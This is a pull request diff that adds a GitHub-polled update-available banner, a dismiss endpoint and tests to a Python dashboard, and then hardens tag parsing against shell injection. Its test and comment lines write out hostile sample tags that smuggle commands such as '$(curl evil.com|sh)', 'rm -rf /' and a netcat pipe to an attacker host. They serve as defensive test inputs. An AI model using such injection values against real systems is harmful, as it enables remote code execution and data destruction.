### PR TITLE
feat(mastio): update-available banner with copy-paste upgrade

### DIFF
--- a/mcp_proxy/dashboard/router.py
+++ b/mcp_proxy/dashboard/router.py
@@ -3993,6 +3993,101 @@ async def users_reset_tofu_pin(principal_id: str, request: Request):
     )
 
 
+@router.get("/api/update-status")
+async def api_update_status(request: Request):
+    """Render the update-available banner fragment (HTMX target).
+
+    Polls GitHub releases lazily — first call after the 24h cache
+    expiry pays the latency, subsequent calls within the window read
+    from ``proxy_config``. Returns empty HTML when no update is
+    available or the operator has dismissed the current latest.
+
+    No-auth on the GET would leak the running Mastio version to any
+    visitor; gate to logged-in sessions only. The banner is
+    operator-only by design.
+    """
+    session = get_session(request)
+    if not session.logged_in:
+        return HTMLResponse("")
+
+    from mcp_proxy.dashboard.update_check import get_update_status
+
+    try:
+        status = await get_update_status()
+    except Exception as exc:  # noqa: BLE001
+        # Never blank the page on update-check failure — log and
+        # render empty so the dashboard keeps working offline.
+        _log.warning("api_update_status: failed: %s", exc)
+        return HTMLResponse("")
+
+    if not status.available:
+        return HTMLResponse("")
+
+    # Strip the ``mastio-v`` prefix so the tarball filename matches the
+    # release-mastio.yml artifact naming (``cullis-mastio-bundle-X.Y.Z.tar.gz``).
+    latest_tag = status.latest or ""
+    latest_stripped = latest_tag.removeprefix("mastio-v") if latest_tag else ""
+    return templates.TemplateResponse(
+        "update_banner.html",
+        {
+            "request": request,
+            "current": status.current,
+            "latest": latest_tag,
+            "latest_stripped": latest_stripped,
+            "latest_url": status.latest_url or "",
+            "csrf_token": session.csrf_token,
+        },
+    )
+
+
+@router.post("/api/update-status/dismiss")
+async def api_update_status_dismiss(request: Request):
+    """Operator dismisses the banner for the current latest version.
+
+    Pins the dismissed tag in ``proxy_config``; the banner stays
+    hidden until a newer release shows up in a future poll. Audit
+    row captures who dismissed and which version so the operator
+    can find their own dismissal later (rare but useful).
+    """
+    session = require_login(request)
+    if isinstance(session, RedirectResponse):
+        return session
+    if not await verify_csrf(request, session):
+        return RedirectResponse("/proxy/overview?error=csrf", status_code=303)
+
+    from mcp_proxy.dashboard.update_check import dismiss_current_latest
+    from mcp_proxy.db import log_audit
+
+    dismissed = await dismiss_current_latest()
+    operator = (
+        getattr(session, "principal_id", None)
+        or getattr(session, "username", None)
+        or "dashboard-admin"
+    )
+    if dismissed is not None:
+        try:
+            await log_audit(
+                agent_id=operator,
+                action="update_check.dismiss",
+                status="success",
+                details={"dismissed_tag": dismissed},
+            )
+        except Exception as exc:  # noqa: BLE001
+            _log.warning(
+                "api_update_status_dismiss: audit append failed: %s", exc,
+            )
+
+    # Redirect back to the page the operator was on (Referer) or
+    # overview as a safe default. Refresh causes the HTMX banner load
+    # to re-fetch and see dismissed=true → empty fragment.
+    referer = request.headers.get("referer", "/proxy/overview")
+    # Defensive: only honor same-origin referers so a malicious link
+    # can't bounce the operator off the dashboard.
+    if not referer.startswith("/") and "/proxy/" not in referer:
+        referer = "/proxy/overview"
+    return RedirectResponse(referer, status_code=303)
+
+
 @router.get("/badge/audit")
 async def badge_audit(request: Request):
     """Return recent audit count badge fragment."""

--- a/mcp_proxy/dashboard/templates/base.html
+++ b/mcp_proxy/dashboard/templates/base.html
@@ -176,6 +176,12 @@
              hx-trigger="load, every 10s"
              hx-swap="innerHTML"></div>
 
+        <!-- Update-available banner (HTMX, lazy poll with 24h server cache) -->
+        <div id="update-status-banner"
+             hx-get="/proxy/api/update-status"
+             hx-trigger="load delay:500ms"
+             hx-swap="innerHTML"></div>
+
         <main class="flex-1 overflow-y-auto p-6">
             {% block content %}{% endblock %}
         </main>

--- a/mcp_proxy/dashboard/templates/update_banner.html
+++ b/mcp_proxy/dashboard/templates/update_banner.html
@@ -1,0 +1,36 @@
+<details class="bg-amber-900/15 border-b border-amber-700/30 group" id="update-banner">
+    <summary class="px-6 py-2 cursor-pointer flex items-center justify-between hover:bg-amber-900/20 transition-colors">
+        <span class="text-amber-300/90 text-xs flex items-center gap-2">
+            <svg class="w-3.5 h-3.5" fill="none" stroke="currentColor" viewBox="0 0 24 24"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M13 16h-1v-4h-1m1-4h.01M21 12a9 9 0 11-18 0 9 9 0 0118 0z"/></svg>
+            Mastio update available: <strong class="font-mono text-amber-200">{{ latest }}</strong>
+            <span class="text-amber-500/60">(you're on <span class="font-mono">{{ current }}</span>)</span>
+            <span class="text-amber-500/40 text-[10px] italic group-open:hidden">— click for instructions</span>
+        </span>
+        <form method="post" action="/proxy/api/update-status/dismiss" onclick="event.stopPropagation()" class="inline">
+            <input type="hidden" name="csrf_token" value="{{ csrf_token }}">
+            <button type="submit" class="text-amber-400/60 hover:text-amber-200 text-[10px] uppercase tracking-wider px-2 py-1 rounded border border-amber-700/40 hover:border-amber-600/60 transition-colors">
+                Dismiss
+            </button>
+        </form>
+    </summary>
+    <div class="px-6 py-4 bg-amber-950/30 text-amber-200/80 text-xs space-y-3 border-t border-amber-700/20">
+        <p class="text-amber-300/90">
+            On the host where this Mastio runs, execute the four commands below.
+            Volumes (DB, Org CA, certs) are preserved.
+            The Mastio container restarts with the new image; the dashboard URL stays the same.
+        </p>
+        <pre class="bg-surface-950 border border-gray-800 p-3 rounded overflow-x-auto"><code style="font-family: 'JetBrains Mono', monospace;">cd ~/cullis-mastio-bundle
+wget https://github.com/cullis-security/cullis/releases/download/{{ latest }}/cullis-mastio-bundle-{{ latest_stripped }}.tar.gz
+tar xzf cullis-mastio-bundle-{{ latest_stripped }}.tar.gz --strip-components=1 --overwrite
+./deploy.sh --pull</code></pre>
+        {% if latest_url %}
+        <p class="text-[10px] text-amber-400/70">
+            Release notes: <a href="{{ latest_url }}" target="_blank" rel="noopener noreferrer" class="underline hover:text-amber-200">{{ latest_url }}</a>
+        </p>
+        {% endif %}
+        <p class="text-[10px] text-amber-400/50 italic">
+            This banner reads from a GitHub releases poll cached for 24 hours, no telemetry leaves the Mastio.
+            Dismiss to suppress it for the current version; a future newer release re-surfaces it automatically.
+        </p>
+    </div>
+</details>

--- a/mcp_proxy/dashboard/update_check.py
+++ b/mcp_proxy/dashboard/update_check.py
@@ -1,0 +1,270 @@
+"""Mastio self-update check: poll GitHub releases for the latest
+``mastio-vX.Y.Z`` tag, cache the result in ``proxy_config``, surface
+a dismissible banner on the dashboard.
+
+This is operational, not federation: the Mastio polls GitHub directly,
+NOT through the Court ([[court-is-federation-broker-not-management-hub]]).
+Each org is sovereign on its own update lifecycle. The Court does not
+need to know which version each federated Mastio runs.
+
+The check is informational only — the Mastio does NOT auto-apply the
+upgrade. The banner shows the operator that a new release exists and
+hands over a copy-pasteable command to run on the host. Self-execution
+would require Docker socket access from inside the container, which
+crosses a privilege boundary the threat model refuses ([[update-button-inside-mastio-is-anti-pattern]]).
+"""
+from __future__ import annotations
+
+import logging
+import os
+import re
+from datetime import datetime, timedelta, timezone
+from typing import Optional
+
+import httpx
+from pydantic import BaseModel
+
+from mcp_proxy.db import get_config, set_config
+
+_log = logging.getLogger("mcp_proxy.dashboard.update_check")
+
+
+# GitHub repo + endpoint. Hardcoded — the bundle is one product, not
+# a generic update framework. If we ever ship a private fork that needs
+# a different repo, this becomes an env knob; for now keep it static
+# so an attacker who can flip an env can't redirect the check.
+_GITHUB_REPO = "cullis-security/cullis"
+_RELEASES_URL = f"https://api.github.com/repos/{_GITHUB_REPO}/releases"
+
+# Stay well below GitHub's 60 req/hour unauthenticated quota.
+_POLL_INTERVAL = timedelta(hours=24)
+
+# How long the in-process cache is fresh. We hold the value in DB
+# config but also short-circuit via this window so concurrent requests
+# don't all hit GitHub on startup.
+_HTTP_TIMEOUT = 5.0
+
+# Tag prefix we care about. Other tags (connector-vX.Y.Z, chat-vX.Y.Z,
+# frontdesk-bundle-vX.Y.Z) live in the same repo but address other
+# components — ignore them.
+_TAG_PREFIX = "mastio-v"
+
+# Config keys.
+_KEY_LAST_POLL = "update_check_last_poll_at"
+_KEY_LATEST_TAG = "update_check_latest_tag"
+_KEY_LATEST_URL = "update_check_latest_url"
+_KEY_DISMISSED_TAG = "update_check_dismissed_tag"
+
+
+class ReleaseInfo(BaseModel):
+    """The fields we extract from a GitHub release entry."""
+    tag: str
+    html_url: str
+
+
+class UpdateStatus(BaseModel):
+    """What the dashboard renders.
+
+    ``available`` is the only field the template cares about for the
+    "show banner / hide banner" decision. ``latest_url`` lets the modal
+    link to the release notes. ``current`` is informational.
+    """
+    current: str
+    latest: Optional[str] = None
+    latest_url: Optional[str] = None
+    available: bool = False
+    last_polled_at: Optional[str] = None
+
+
+def _current_version() -> str:
+    """Resolve the running Mastio version.
+
+    Matches the env that ``mcp_proxy/main.py`` already reads at lifespan
+    start. ``dev`` when running from source.
+    """
+    return os.environ.get("CULLIS_MASTIO_VERSION", "dev")
+
+
+def _parse_semver(tag: str) -> Optional[tuple[int, int, int, str]]:
+    """``mastio-v0.3.8`` → ``(0, 3, 8, "")``. ``mastio-v0.3.8-rc2`` →
+    ``(0, 3, 8, "rc2")``. ``None`` if the tag is not a recognisable
+    semver under our prefix.
+
+    The pre-release suffix sorts AFTER the bare version so an rc never
+    triumphs over a final release with the same x.y.z (matches the
+    semver spec: 1.0.0-rc1 < 1.0.0). We model this by treating an
+    empty suffix as the highest possible string for the sort key.
+    """
+    if not tag.startswith(_TAG_PREFIX):
+        return None
+    rest = tag[len(_TAG_PREFIX):]
+    m = re.match(r"^(\d+)\.(\d+)\.(\d+)(?:-(.+))?$", rest)
+    if not m:
+        return None
+    major, minor, patch, suffix = m.groups()
+    return int(major), int(minor), int(patch), suffix or ""
+
+
+def _is_newer(candidate_tag: str, current_version: str) -> bool:
+    """Return True iff ``candidate_tag`` is a newer semver than the
+    bare ``current_version`` (no ``mastio-v`` prefix on current — it's
+    the env value like ``0.3.8``).
+
+    Defensive: any parse failure on either side returns False so the
+    banner never fires from garbled data. ``dev`` current always
+    triggers the banner because any tagged release is "newer than dev".
+    """
+    if current_version == "dev":
+        return True
+    c = _parse_semver(candidate_tag)
+    if c is None:
+        return False
+    cur = _parse_semver(f"{_TAG_PREFIX}{current_version}")
+    if cur is None:
+        return False
+    # Compare (M, m, p) first, then suffix. Empty suffix > non-empty
+    # so a final release beats an rc with the same x.y.z.
+    c_key = (c[0], c[1], c[2], 1 if c[3] == "" else 0, c[3])
+    cur_key = (cur[0], cur[1], cur[2], 1 if cur[3] == "" else 0, cur[3])
+    return c_key > cur_key
+
+
+async def _fetch_latest_from_github() -> Optional[ReleaseInfo]:
+    """One-shot GET to GitHub releases API.
+
+    Returns the highest semver ``mastio-v*`` release (by parsed x.y.z,
+    final > rc) or ``None`` on any transport / parse error. The caller
+    decides what to do with ``None`` (typically: keep the cached value,
+    don't crash the dashboard).
+
+    ``/releases`` returns up to 30 entries by default and includes
+    pre-releases. Filter + sort client-side so the choice is in our
+    hands, not GitHub's "latest" heuristic (which picks the most
+    recently published non-prerelease across ALL tag prefixes,
+    including connector / chat / frontdesk-bundle — wrong for us).
+    """
+    headers = {
+        "Accept": "application/vnd.github+json",
+        "User-Agent": f"cullis-mastio/{_current_version()}",
+        # GitHub recommends pinning the API version; v2022-11-28 is the
+        # stable line at the time of writing.
+        "X-GitHub-Api-Version": "2022-11-28",
+    }
+    try:
+        async with httpx.AsyncClient(timeout=_HTTP_TIMEOUT) as client:
+            resp = await client.get(_RELEASES_URL, headers=headers)
+        if resp.status_code != 200:
+            _log.warning(
+                "update_check: GitHub responded HTTP %s", resp.status_code,
+            )
+            return None
+        entries = resp.json()
+    except (httpx.HTTPError, ValueError) as exc:  # ValueError covers JSON decode
+        _log.warning("update_check: GitHub fetch failed: %s", exc)
+        return None
+
+    candidates: list[tuple[tuple, str, str]] = []
+    for entry in entries:
+        if not isinstance(entry, dict):
+            continue
+        tag = entry.get("tag_name") or ""
+        if not tag.startswith(_TAG_PREFIX):
+            continue
+        parsed = _parse_semver(tag)
+        if parsed is None:
+            continue
+        key = (parsed[0], parsed[1], parsed[2], 1 if parsed[3] == "" else 0, parsed[3])
+        html_url = entry.get("html_url") or ""
+        if not html_url.startswith("https://github.com/"):
+            # Defensive: refuse anything not on github.com so a poisoned
+            # response can't redirect the operator to a phishing link.
+            continue
+        candidates.append((key, tag, html_url))
+
+    if not candidates:
+        return None
+    candidates.sort(key=lambda x: x[0], reverse=True)
+    _, tag, html_url = candidates[0]
+    return ReleaseInfo(tag=tag, html_url=html_url)
+
+
+async def _refresh_cache_if_stale() -> None:
+    """If the cache is older than ``_POLL_INTERVAL``, poll GitHub once
+    and persist. Swallows errors — the dashboard must never block on
+    GitHub being reachable.
+
+    Called lazily from the status endpoint, NOT from the lifespan, so
+    a Mastio behind a strict outbound firewall doesn't pay startup
+    latency on every boot. First dashboard hit triggers the first
+    poll.
+    """
+    now = datetime.now(timezone.utc)
+    last_raw = await get_config(_KEY_LAST_POLL)
+    if last_raw:
+        try:
+            last = datetime.fromisoformat(last_raw)
+            if now - last < _POLL_INTERVAL:
+                return  # cache still fresh
+        except ValueError:
+            pass  # garbled timestamp, treat as never polled
+
+    info = await _fetch_latest_from_github()
+    # Always update the timestamp so a transient GitHub outage doesn't
+    # cause us to hammer the API. On success we also refresh the tag.
+    await set_config(_KEY_LAST_POLL, now.isoformat())
+    if info is not None:
+        await set_config(_KEY_LATEST_TAG, info.tag)
+        await set_config(_KEY_LATEST_URL, info.html_url)
+
+
+async def get_update_status() -> UpdateStatus:
+    """Return what the dashboard banner should render.
+
+    Lazy-polls GitHub if the cache is stale. Honors the operator's
+    dismiss: if ``update_check_dismissed_tag`` equals the cached
+    ``update_check_latest_tag``, ``available`` is False and the
+    banner is suppressed until a newer release shows up.
+    """
+    await _refresh_cache_if_stale()
+
+    current = _current_version()
+    latest_tag = await get_config(_KEY_LATEST_TAG)
+    latest_url = await get_config(_KEY_LATEST_URL)
+    dismissed = await get_config(_KEY_DISMISSED_TAG)
+    last_poll = await get_config(_KEY_LAST_POLL)
+
+    available = False
+    if latest_tag and _is_newer(latest_tag, current):
+        if dismissed != latest_tag:
+            available = True
+
+    return UpdateStatus(
+        current=current,
+        latest=latest_tag,
+        latest_url=latest_url,
+        available=available,
+        last_polled_at=last_poll,
+    )
+
+
+async def dismiss_current_latest() -> Optional[str]:
+    """Operator clicked dismiss on the banner. Pin the dismissed tag
+    to whatever is currently cached as ``latest``. Banner stays hidden
+    until a newer release arrives.
+
+    Returns the tag that was dismissed (for the audit row), or None
+    if there was nothing cached to dismiss.
+    """
+    latest = await get_config(_KEY_LATEST_TAG)
+    if not latest:
+        return None
+    await set_config(_KEY_DISMISSED_TAG, latest)
+    return latest
+
+
+__all__ = [
+    "ReleaseInfo",
+    "UpdateStatus",
+    "dismiss_current_latest",
+    "get_update_status",
+]

--- a/mcp_proxy/dashboard/update_check.py
+++ b/mcp_proxy/dashboard/update_check.py
@@ -94,15 +94,36 @@ def _parse_semver(tag: str) -> Optional[tuple[int, int, int, str]]:
     triumphs over a final release with the same x.y.z (matches the
     semver spec: 1.0.0-rc1 < 1.0.0). We model this by treating an
     empty suffix as the highest possible string for the sort key.
+
+    The suffix character class is intentionally narrow: only
+    ``[A-Za-z0-9.]+``. Git tag names permit shell metacharacters
+    (``$``, ``(``, backticks, ``|``, ``;``, quotes, whitespace),
+    so a permissive ``(?:-(.+))?`` would let an adversary with
+    publish access to the repo craft a tag like
+    ``mastio-v9.9.9-$(curl evil.com/x|sh)`` that parses, gets cached,
+    and is then rendered into the "copy these commands" block of
+    ``update_banner.html``. Jinja autoescape protects against HTML
+    injection but browsers copy text content, so the operator
+    pasting into a shell would execute the subshell. Forcing the
+    suffix to alphanumeric + dot eliminates that path while still
+    accepting every realistic pre-release tag (``rc1``, ``alpha.2``,
+    ``beta3``, ``dev.20251231``).
     """
     if not tag.startswith(_TAG_PREFIX):
         return None
     rest = tag[len(_TAG_PREFIX):]
-    m = re.match(r"^(\d+)\.(\d+)\.(\d+)(?:-(.+))?$", rest)
+    m = re.match(r"^(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z0-9.]+))?$", rest)
     if not m:
         return None
     major, minor, patch, suffix = m.groups()
     return int(major), int(minor), int(patch), suffix or ""
+
+
+# Belt-and-suspenders character class for the tag as a whole, applied
+# in ``get_update_status`` before rendering. Catches the case where a
+# legacy cached value (from a previous bundle with a looser regex)
+# survives across an upgrade.
+_TAG_SAFE_RE = re.compile(r"^[A-Za-z0-9.\-]+$")
 
 
 def _is_newer(candidate_tag: str, current_version: str) -> bool:
@@ -233,15 +254,23 @@ async def get_update_status() -> UpdateStatus:
     dismissed = await get_config(_KEY_DISMISSED_TAG)
     last_poll = await get_config(_KEY_LAST_POLL)
 
+    # Belt-and-suspenders: refuse to surface a cached tag that does
+    # not match the safe character class even if it somehow slipped
+    # past ``_parse_semver`` (legacy cache row from a permissive build,
+    # manual DB tampering, etc.). The banner renders this value into
+    # a shell-command block, so a poisoned tag must never reach the
+    # template.
+    safe_tag = latest_tag if (latest_tag and _TAG_SAFE_RE.match(latest_tag)) else None
+
     available = False
-    if latest_tag and _is_newer(latest_tag, current):
-        if dismissed != latest_tag:
+    if safe_tag and _is_newer(safe_tag, current):
+        if dismissed != safe_tag:
             available = True
 
     return UpdateStatus(
         current=current,
-        latest=latest_tag,
-        latest_url=latest_url,
+        latest=safe_tag,
+        latest_url=latest_url if safe_tag else None,
         available=available,
         last_polled_at=last_poll,
     )

--- a/tests/test_proxy_update_check.py
+++ b/tests/test_proxy_update_check.py
@@ -58,6 +58,44 @@ def test_is_newer_malformed_tag_refuses():
     assert _is_newer("mastio-vX.Y.Z", "0.3.7") is False     # not numeric
 
 
+def test_parse_semver_refuses_shell_metacharacters_in_suffix():
+    """Security fix: the pre-release suffix regex used to be ``(.+)``
+    which accepted shell metacharacters. A poisoned tag like
+    ``mastio-v9.9.9-$(curl evil|sh)`` would then be rendered into
+    the "copy these commands" block of the banner template; the
+    operator pasting it would execute the subshell. The suffix is
+    now constrained to ``[A-Za-z0-9.]+``. This test asserts each
+    metacharacter family is refused at parse time."""
+    from mcp_proxy.dashboard.update_check import _parse_semver
+    poisoned = [
+        "mastio-v9.9.9-$(curl evil.com|sh)",     # subshell expansion
+        "mastio-v9.9.9-`curl evil`",             # backticks
+        "mastio-v9.9.9-rc1;rm -rf /",            # command separator
+        "mastio-v9.9.9-rc1|nc attacker 1337",    # pipe
+        "mastio-v9.9.9-\"><script>alert(1)",     # quote + bracket
+        "mastio-v9.9.9- rc1",                    # whitespace
+        "mastio-v9.9.9-rc1\nrm -rf /",           # newline (also caught by $ anchor + DOTALL off)
+    ]
+    for tag in poisoned:
+        assert _parse_semver(tag) is None, (
+            f"poisoned tag {tag!r} must NOT parse — would land in "
+            "shell-command rendering of update_banner.html"
+        )
+
+    # Realistic pre-release labels still parse.
+    legitimate = [
+        "mastio-v9.9.9-rc1",
+        "mastio-v9.9.9-rc.1",
+        "mastio-v9.9.9-alpha.2",
+        "mastio-v9.9.9-beta3",
+        "mastio-v9.9.9-dev.20260513",
+    ]
+    for tag in legitimate:
+        assert _parse_semver(tag) is not None, (
+            f"realistic pre-release {tag!r} must still parse"
+        )
+
+
 # ── status + dismiss flow ──────────────────────────────────────────────
 
 
@@ -156,6 +194,43 @@ async def test_get_update_status_refetches_after_window(
     monkeypatch.setattr(update_check, "_fetch_latest_from_github", fake_fetch)
     status = await update_check.get_update_status()
     assert status.latest == "mastio-v0.4.0"
+
+
+@pytest.mark.asyncio
+async def test_get_update_status_refuses_poisoned_cached_tag(
+    _isolated_db, monkeypatch,
+):
+    """Belt-and-suspenders: a poisoned tag that somehow landed in the
+    cache (legacy bundle with a looser regex, manual DB tampering,
+    etc.) MUST NOT surface to the template. Defence-in-depth on top
+    of the tightened ``_parse_semver``."""
+    from mcp_proxy.db import init_db, set_config
+    from mcp_proxy.dashboard import update_check
+    s = await _get_settings()
+    await init_db(s.database_url)
+
+    # Pre-seed a malicious tag directly into the cache. Mark the cache
+    # as fresh so the lazy poll does NOT overwrite it before the
+    # render call.
+    now = datetime.now(timezone.utc)
+    await set_config("update_check_last_poll_at", now.isoformat())
+    await set_config(
+        "update_check_latest_tag", "mastio-v9.9.9-$(curl evil|sh)",
+    )
+    await set_config(
+        "update_check_latest_url",
+        "https://github.com/cullis-security/cullis/releases/tag/mastio-v9.9.9",
+    )
+
+    status = await update_check.get_update_status()
+    assert status.available is False, (
+        "poisoned cached tag must not trigger the banner — belt and "
+        "suspenders defence on top of _parse_semver"
+    )
+    assert status.latest is None, (
+        "the poisoned value must be scrubbed from the response object "
+        "so a downstream caller cannot accidentally re-surface it"
+    )
 
 
 @pytest.mark.asyncio

--- a/tests/test_proxy_update_check.py
+++ b/tests/test_proxy_update_check.py
@@ -1,0 +1,489 @@
+"""Mastio update-check service tests.
+
+Covers the helper module (``mcp_proxy/dashboard/update_check.py``) +
+the two dashboard endpoints (``GET /proxy/api/update-status`` +
+``POST /proxy/api/update-status/dismiss``).
+
+The test never hits ``api.github.com`` for real — every test monkeypatches
+``_fetch_latest_from_github`` so the suite stays hermetic and runs
+offline.
+"""
+from __future__ import annotations
+
+from datetime import datetime, timedelta, timezone
+
+import pytest
+from httpx import ASGITransport, AsyncClient
+
+
+# ── helper unit tests (semver compare) ─────────────────────────────────
+
+
+def test_is_newer_basic_patch_bump():
+    from mcp_proxy.dashboard.update_check import _is_newer
+    assert _is_newer("mastio-v0.3.8", "0.3.7") is True
+    assert _is_newer("mastio-v0.3.7", "0.3.8") is False
+    assert _is_newer("mastio-v0.3.8", "0.3.8") is False
+
+
+def test_is_newer_minor_and_major():
+    from mcp_proxy.dashboard.update_check import _is_newer
+    assert _is_newer("mastio-v0.4.0", "0.3.99") is True
+    assert _is_newer("mastio-v1.0.0", "0.99.99") is True
+
+
+def test_is_newer_rc_loses_to_final_with_same_xyz():
+    """A pre-release with the same x.y.z must NOT trigger the banner
+    when the operator is already on the final release. Matches semver
+    spec: 0.3.8-rc1 < 0.3.8."""
+    from mcp_proxy.dashboard.update_check import _is_newer
+    assert _is_newer("mastio-v0.3.8-rc1", "0.3.8") is False
+    assert _is_newer("mastio-v0.3.8", "0.3.8-rc1") is True
+
+
+def test_is_newer_dev_always_outdated():
+    """A Mastio running from source (``dev`` version) should always
+    see any release as newer, so the operator gets the banner."""
+    from mcp_proxy.dashboard.update_check import _is_newer
+    assert _is_newer("mastio-v0.0.1", "dev") is True
+    assert _is_newer("mastio-v999.999.999", "dev") is True
+
+
+def test_is_newer_malformed_tag_refuses():
+    """Garbled GitHub data → don't fire the banner. Defensive: the
+    banner exists for operator UX, not for surfacing API noise."""
+    from mcp_proxy.dashboard.update_check import _is_newer
+    assert _is_newer("connector-v0.4.4", "0.3.7") is False  # wrong prefix
+    assert _is_newer("mastio-v0.3", "0.3.7") is False       # short semver
+    assert _is_newer("mastio-vX.Y.Z", "0.3.7") is False     # not numeric
+
+
+# ── status + dismiss flow ──────────────────────────────────────────────
+
+
+@pytest.fixture
+def _isolated_db(tmp_path, monkeypatch):
+    """Per-test SQLite + cleared settings cache."""
+    monkeypatch.setenv(
+        "MCP_PROXY_DATABASE_URL",
+        f"sqlite+aiosqlite:///{tmp_path}/proxy_update.sqlite",
+    )
+    monkeypatch.delenv("PROXY_DB_URL", raising=False)
+    monkeypatch.setenv("CULLIS_MASTIO_VERSION", "0.3.7")
+    from mcp_proxy.config import get_settings
+    get_settings.cache_clear()
+    yield
+    get_settings.cache_clear()
+
+
+@pytest.mark.asyncio
+async def test_get_update_status_fetches_when_cache_empty(
+    _isolated_db, monkeypatch,
+):
+    from mcp_proxy.db import init_db
+    from mcp_proxy.dashboard import update_check
+    settings_url = (await _get_settings()).database_url
+    await init_db(settings_url)
+
+    fetch_calls: list[int] = []
+
+    async def fake_fetch():
+        fetch_calls.append(1)
+        return update_check.ReleaseInfo(
+            tag="mastio-v0.3.8",
+            html_url="https://github.com/cullis-security/cullis/releases/tag/mastio-v0.3.8",
+        )
+
+    monkeypatch.setattr(update_check, "_fetch_latest_from_github", fake_fetch)
+    status = await update_check.get_update_status()
+    assert status.current == "0.3.7"
+    assert status.latest == "mastio-v0.3.8"
+    assert status.available is True
+    assert len(fetch_calls) == 1, "first call should hit GitHub"
+
+
+@pytest.mark.asyncio
+async def test_get_update_status_uses_cache_inside_window(
+    _isolated_db, monkeypatch,
+):
+    from mcp_proxy.db import init_db, set_config
+    from mcp_proxy.dashboard import update_check
+    s = await _get_settings()
+    await init_db(s.database_url)
+
+    # Pre-seed a fresh cache.
+    now = datetime.now(timezone.utc)
+    await set_config("update_check_last_poll_at", now.isoformat())
+    await set_config("update_check_latest_tag", "mastio-v0.3.8")
+    await set_config(
+        "update_check_latest_url",
+        "https://github.com/cullis-security/cullis/releases/tag/mastio-v0.3.8",
+    )
+
+    fetch_calls: list[int] = []
+
+    async def fake_fetch():
+        fetch_calls.append(1)
+        return None
+
+    monkeypatch.setattr(update_check, "_fetch_latest_from_github", fake_fetch)
+    status = await update_check.get_update_status()
+    assert status.latest == "mastio-v0.3.8"
+    assert status.available is True
+    assert len(fetch_calls) == 0, "cache should short-circuit the fetch"
+
+
+@pytest.mark.asyncio
+async def test_get_update_status_refetches_after_window(
+    _isolated_db, monkeypatch,
+):
+    from mcp_proxy.db import init_db, set_config
+    from mcp_proxy.dashboard import update_check
+    s = await _get_settings()
+    await init_db(s.database_url)
+
+    # Pre-seed a STALE cache (older than the 24h window).
+    stale = datetime.now(timezone.utc) - timedelta(days=2)
+    await set_config("update_check_last_poll_at", stale.isoformat())
+    await set_config("update_check_latest_tag", "mastio-v0.3.7")
+
+    async def fake_fetch():
+        return update_check.ReleaseInfo(
+            tag="mastio-v0.4.0",
+            html_url="https://github.com/cullis-security/cullis/releases/tag/mastio-v0.4.0",
+        )
+
+    monkeypatch.setattr(update_check, "_fetch_latest_from_github", fake_fetch)
+    status = await update_check.get_update_status()
+    assert status.latest == "mastio-v0.4.0"
+
+
+@pytest.mark.asyncio
+async def test_get_update_status_swallows_fetch_failure(
+    _isolated_db, monkeypatch,
+):
+    """When GitHub is unreachable, the cache TIMESTAMP still advances
+    (so we don't hammer the API) but the cached tag stays as-is."""
+    from mcp_proxy.db import init_db, get_config, set_config
+    from mcp_proxy.dashboard import update_check
+    s = await _get_settings()
+    await init_db(s.database_url)
+
+    # Stale cache → fetch will be attempted but fails.
+    stale = datetime.now(timezone.utc) - timedelta(days=2)
+    await set_config("update_check_last_poll_at", stale.isoformat())
+    await set_config("update_check_latest_tag", "mastio-v0.3.8")
+
+    async def fake_fetch():
+        return None  # transport error / non-200 / JSON decode
+
+    monkeypatch.setattr(update_check, "_fetch_latest_from_github", fake_fetch)
+    status = await update_check.get_update_status()
+    # Tag survives.
+    assert status.latest == "mastio-v0.3.8"
+    # Timestamp advances so the next call doesn't refetch immediately.
+    new_ts = await get_config("update_check_last_poll_at")
+    assert new_ts != stale.isoformat()
+
+
+@pytest.mark.asyncio
+async def test_dismiss_hides_banner_for_current_latest(
+    _isolated_db, monkeypatch,
+):
+    from mcp_proxy.db import init_db
+    from mcp_proxy.dashboard import update_check
+    s = await _get_settings()
+    await init_db(s.database_url)
+
+    async def fake_fetch():
+        return update_check.ReleaseInfo(
+            tag="mastio-v0.3.8",
+            html_url="https://github.com/cullis-security/cullis/releases/tag/mastio-v0.3.8",
+        )
+
+    monkeypatch.setattr(update_check, "_fetch_latest_from_github", fake_fetch)
+    status = await update_check.get_update_status()
+    assert status.available is True
+
+    dismissed = await update_check.dismiss_current_latest()
+    assert dismissed == "mastio-v0.3.8"
+
+    # Available should now be False even though current < latest.
+    status2 = await update_check.get_update_status()
+    assert status2.latest == "mastio-v0.3.8"
+    assert status2.available is False
+
+
+@pytest.mark.asyncio
+async def test_dismiss_does_not_block_newer_release(
+    _isolated_db, monkeypatch,
+):
+    """Dismissing v0.3.8 must NOT suppress the banner when v0.3.9 arrives
+    later. The dismiss is per-tag, not permanent."""
+    from mcp_proxy.db import init_db
+    from mcp_proxy.dashboard import update_check
+    s = await _get_settings()
+    await init_db(s.database_url)
+
+    next_tag = "mastio-v0.3.8"
+
+    async def fake_fetch():
+        return update_check.ReleaseInfo(
+            tag=next_tag,
+            html_url=f"https://github.com/cullis-security/cullis/releases/tag/{next_tag}",
+        )
+
+    monkeypatch.setattr(update_check, "_fetch_latest_from_github", fake_fetch)
+    await update_check.get_update_status()
+    await update_check.dismiss_current_latest()
+
+    # New release arrives.
+    next_tag = "mastio-v0.3.9"
+    # Bypass the 24h cache by setting last_poll_at to a stale time.
+    from mcp_proxy.db import set_config
+    stale = datetime.now(timezone.utc) - timedelta(days=2)
+    await set_config("update_check_last_poll_at", stale.isoformat())
+
+    status = await update_check.get_update_status()
+    assert status.latest == "mastio-v0.3.9"
+    assert status.available is True, (
+        "dismiss on v0.3.8 must not silence v0.3.9"
+    )
+
+
+# ── _fetch_latest_from_github (HTTP layer, mocked transport) ───────────
+
+
+@pytest.mark.asyncio
+async def test_fetch_picks_highest_mastio_semver_ignoring_other_prefixes(
+    monkeypatch,
+):
+    """Releases page lists connector + chat + frontdesk-bundle + mastio
+    tags. Only ``mastio-v*`` count; among those, the highest x.y.z wins
+    (final > rc)."""
+    import httpx
+    from mcp_proxy.dashboard import update_check
+
+    payload = [
+        # Most recent on top — GitHub's natural order is by published_at desc.
+        {"tag_name": "connector-v0.4.5",
+         "html_url": "https://github.com/cullis-security/cullis/releases/tag/connector-v0.4.5"},
+        {"tag_name": "mastio-v0.3.8-rc2",
+         "html_url": "https://github.com/cullis-security/cullis/releases/tag/mastio-v0.3.8-rc2"},
+        {"tag_name": "frontdesk-bundle-v0.3.0",
+         "html_url": "https://github.com/cullis-security/cullis/releases/tag/frontdesk-bundle-v0.3.0"},
